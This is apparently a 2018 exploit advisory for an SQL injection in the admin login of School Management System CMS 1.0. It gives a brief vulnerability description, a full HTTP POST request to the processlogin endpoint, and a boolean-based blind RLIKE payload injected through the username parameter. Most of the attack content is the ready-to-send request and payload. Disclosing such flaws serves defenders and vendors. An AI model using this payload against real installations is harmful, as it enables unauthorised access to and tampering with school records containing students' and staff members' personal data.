School Management System CMS 1.0 SQL Injection

`# Exploit Title: School Management System CMS 1.0 - Admin Login SQL  
Injection  
# Dork: N/A  
# Date: 23.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor : Wecodex Solutions  
# Vendor Homepage: https://www.wecodex.com/item/view/school-management-system-in-php-and-mysql/5  
# Version: 1.0  
# Category: Webapps  
# Tested on: Kali linux  
# Description : PHP Dashboards is prone to an SQL-injection vulnerability  
because it fails to sufficiently sanitize user-supplied data before using  
it in an SQL query.Exploiting this issue could allow an attacker to  
compromise the application, access or modify data, or exploit latent  
vulnerabilities in the underlying database.  
  
====================================================  
  
# PoC : SQLi :  
  
https://test.com/school/maestro/index.php?view=processlogin  
  
POST /school/maestro/index.php?view=processlogin HTTP/1.1  
Host: test.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101  
Firefox/45.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://test.com/school/maestro/  
Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 30  
username=admin&password=123456  
  
  
Vulnerable Payload :  
  
Parameter: username (POST)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or  
GROUP BY clause  
Payload: username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN  
0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456  
  
  
  
====================================================  
  
`